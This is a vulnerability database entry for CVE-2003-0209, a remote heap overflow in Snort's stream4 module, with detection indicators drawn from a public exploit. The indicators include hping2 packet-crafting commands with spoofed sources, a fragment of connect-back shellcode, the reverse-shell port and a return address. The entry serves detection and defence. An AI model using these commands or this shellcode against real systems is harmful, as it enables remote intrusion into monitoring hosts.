CVE-2003-0209
published 2003-05-05


Priority: P3 · 55 · Severity: critical
CVSS 2.0 base score: 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Exploit: available
EPSS: 38.03% (98.4th percentile)
Integer overflow in the TCP stream reassembly module (stream4) for Snort 2.0 and earlier allows remote attackers to execute arbitrary code via large sequence numbers in packets, which enable a heap-based buffer overflow.

Affected (11 ranges)

Vendor      Product     Version range   Fixed in
smoothwall  smoothwall  (not captured)  (not captured)
sourcefire  snort       (10 ranges, not captured)

Detection & IOCs (extracted from sources)

command: $HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 -d 0x1 --setseq 0xffff0023 --setack 0xc0c4c014
command: $HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 -d 0xF00 -E egg --setseq 0xffffffff --setack 0xc0c4c014
command: $HPING2 $IPSRC -a $IPDST -s $PTDST -p $PTSRC --ack -c 1 -d 0 --setseq 0xc0c4c014 --setack 0xffffffff
port: 45295 (0xb0ef)
filename: p7snort191.sh
bytes: \x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51\x68
  • Exploit triggers integer overflow in Snort stream4 TCP reassembly by sending packets with large/crafted sequence numbers (0xffff0023, 0xffffffff) and specific ACK values (0xc0c4c014) to cause a heap-based buffer overflow.
  • First exploit packet uses TCP ACK+RST flags with sequence number 0xffff0023 and ACK 0xc0c4c014 and a 1-byte payload to prime the stream4 state.
  • Second exploit packet delivers the 0xF00 (3840)-byte payload egg (NOP sled + connect-back shellcode + return address padding) with sequence number 0xffffffff, triggering the heap overflow.
  • Shellcode initiates a connect-back (reverse shell) to the attacker on port 45295 (0xb0ef); monitor for unexpected outbound connections from Snort sensor hosts on this port.
  • Exploit uses spoofed source IP (hping2 -a flag) so the apparent source address of the triggering packets is not the true attacker IP; focus detection on the anomalous sequence numbers rather than source IP.
  • NOP sled of 512 bytes (0x90) prepended to shellcode in the payload egg; presence of a large 0x90 NOP sled in a TCP segment targeting Snort sensors is a strong indicator.
  • Default return address used for Slackware 8.0 targets is 0x0819fec2; presence of this value repeated in network payload indicates exploitation attempt.
  • Vulnerability affects the Snort stream4 module; only Snort versions 2.0 and earlier are vulnerable. Snort deployments with stream4 disabled are not exploitable via this vector.
  • The exploit script uses spoofed source IPs via hping2; network-layer ACL blocking based on source IP alone will not prevent exploitation. Detection must rely on payload/sequence number anomalies.